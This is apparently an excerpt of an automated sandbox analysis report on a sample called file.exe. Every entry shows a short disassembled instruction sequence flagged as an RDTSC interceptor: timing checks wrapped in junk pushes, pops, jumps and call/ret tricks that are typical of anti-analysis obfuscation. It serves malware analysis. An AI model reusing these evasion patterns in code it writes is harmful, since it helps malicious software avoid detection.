                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F5E1 second address: 93F5F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9FD0EA45B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F9FD0EA45BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F5F3 second address: 93F605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jnp 00007F9FD0CB38BEh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F605 second address: 93F61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9FD0EA45BBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F61A second address: 93F69E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F9FD0CB38B8h 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jmp 00007F9FD0CB38BCh 0x0000001b jmp 00007F9FD0CB38C8h 0x00000020 popad 0x00000021 pop eax 0x00000022 jmp 00007F9FD0CB38C2h 0x00000027 push 00000003h 0x00000029 call 00007F9FD0CB38C1h 0x0000002e or dword ptr [ebp+122D3920h], edi 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D3AF9h], edx 0x0000003d push 00000003h 0x0000003f and edx, dword ptr [ebp+122D2D6Dh] 0x00000045 push B71BF7A2h 0x0000004a push esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e pop esi 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F69E second address: 93F6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 08E4085Eh 0x0000000e jc 00007F9FD0EA45B9h 0x00000014 movsx ecx, bx 0x00000017 lea ebx, dword ptr [ebp+12445068h] 0x0000001d jns 00007F9FD0EA45B6h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F9FD0EA45C1h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F6D8 second address: 93F6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951BF2 second address: 951BF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95DAEF second address: 95DAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95DC98 second address: 95DC9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95DF5E second address: 95DFA2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9FD0CB38B8h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F9FD0CB38BDh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9FD0CB38BEh 0x0000001a jmp 00007F9FD0CB38C7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E114 second address: 95E130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F9FD0EA45C2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E287 second address: 95E2B0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9FD0CB38C9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F9FD0CB38D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E58C second address: 95E59C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F9FD0EA45B6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E59C second address: 95E5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E5A0 second address: 95E5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D904 second address: 92D909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D909 second address: 92D91C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0EA45BEh 0x00000008 jng 00007F9FD0EA45B6h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D91C second address: 92D935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnc 00007F9FD0CB38B6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 ja 00007F9FD0CB38B6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D935 second address: 92D93D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D93D second address: 92D941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EBD6 second address: 95EBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45BEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F1D2 second address: 95F1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F817 second address: 95F821 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9FD0EA45B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F821 second address: 95F83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9FD0CB38BCh 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F83C second address: 95F840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F840 second address: 95F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0CB38BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F9FD0CB38BCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 961A65 second address: 961AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C4h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnc 00007F9FD0EA45B6h 0x00000011 popad 0x00000012 popad 0x00000013 jng 00007F9FD0EA45DFh 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F9FD0EA45B6h 0x00000021 jmp 00007F9FD0EA45BFh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965D14 second address: 965D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B474 second address: 96B487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007F9FD0EA45B6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B487 second address: 96B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F9FD0CB38C9h 0x0000000f jmp 00007F9FD0CB38C1h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96BCE4 second address: 96BD11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9FD0EA45BFh 0x0000000e jng 00007F9FD0EA45B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DDB9 second address: 96DDBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DE58 second address: 96DE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DE5C second address: 96DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F9FD0CB38BAh 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DE71 second address: 96DE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9FD0EA45C5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DE8A second address: 96DEEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F9FD0CB38C5h 0x00000014 mov eax, dword ptr [eax] 0x00000016 js 00007F9FD0CB38CFh 0x0000001c push esi 0x0000001d jmp 00007F9FD0CB38C7h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 pushad 0x00000029 jo 00007F9FD0CB38B6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E9E8 second address: 96E9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96E9ED second address: 96E9F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96EFBF second address: 96EFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96FD60 second address: 96FD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970F0B second address: 970F94 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9FD0EA45BCh 0x0000000c jno 00007F9FD0EA45B6h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F9FD0EA45B8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2703h] 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D3938h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F9FD0EA45B8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 add edi, dword ptr [ebp+122D2DE1h] 0x0000005e mov esi, dword ptr [ebp+122D3A8Ah] 0x00000064 xchg eax, ebx 0x00000065 jmp 00007F9FD0EA45C6h 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e jnp 00007F9FD0EA45B6h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9706A8 second address: 9706C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9706C3 second address: 9706CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9706CA second address: 9706EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9FD0CB38C5h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97241E second address: 972498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45BBh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jp 00007F9FD0EA45C6h 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F9FD0EA45B8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2AA1h], eax 0x00000035 push 00000000h 0x00000037 cld 0x00000038 push 00000000h 0x0000003a mov edi, dword ptr [ebp+122D2E11h] 0x00000040 xchg eax, ebx 0x00000041 jmp 00007F9FD0EA45C5h 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 je 00007F9FD0EA45B6h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 972F57 second address: 972FE7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9FD0CB38B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jo 00007F9FD0CB38BCh 0x00000012 jg 00007F9FD0CB38B6h 0x00000018 pop ebx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F9FD0CB38B8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 pushad 0x00000035 mov ebx, edi 0x00000037 xor dword ptr [ebp+1244B0D9h], ebx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D2E75h], edi 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007F9FD0CB38B8h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 mov edi, dword ptr [ebp+122D2BFDh] 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F9FD0CB38C5h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 973A6D second address: 973B0A instructions: 0x00000000 rdtsc 0x00000002 js 00007F9FD0EA45CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F9FD0EA45B8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a xor eax, 50BC88A2h 0x00000030 mov bh, 29h 0x00000032 popad 0x00000033 and edi, dword ptr [ebp+122D2C59h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F9FD0EA45B8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 mov dword ptr [ebp+124500DEh], ebx 0x0000005b xchg eax, ebx 0x0000005c jmp 00007F9FD0EA45BCh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F9FD0EA45C9h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 975CB7 second address: 975CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9FD0CB38B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976250 second address: 976255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97715B second address: 9771CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F9FD0CB38BFh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F9FD0CB38B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d xor ebx, 4B6EA538h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F9FD0CB38B8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f or dword ptr [ebp+122D20DFh], ecx 0x00000055 clc 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9771CB second address: 9771E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 979139 second address: 9791A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F9FD0CB38B8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F9FD0CB38B8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f or edi, 1B3EAF38h 0x00000045 push 00000000h 0x00000047 add dword ptr [ebp+122D319Dh], edx 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F9FD0CB38BDh 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97A2E0 second address: 97A2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97932D second address: 979336 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9793E8 second address: 9793EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9793EC second address: 979421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jne 00007F9FD0CB38B8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9FD0CB38BFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D2EC second address: 97D2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D2F0 second address: 97D2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97F1B8 second address: 97F1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97F1BC second address: 97F1D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F9FD0CB38B8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9801D4 second address: 9801DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9801DA second address: 9801DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97F369 second address: 97F387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F9FD0EA45C4h 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97E319 second address: 97E328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9803DB second address: 9803E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981480 second address: 981485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3EA second address: 97E3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9822AB second address: 9822AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3EE second address: 97E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9822AF second address: 9822B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983298 second address: 98329D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984406 second address: 984410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9FD0BBDFF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9855EF second address: 9855F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9855F5 second address: 985606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985606 second address: 98560A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98560A second address: 985614 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0BBDFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
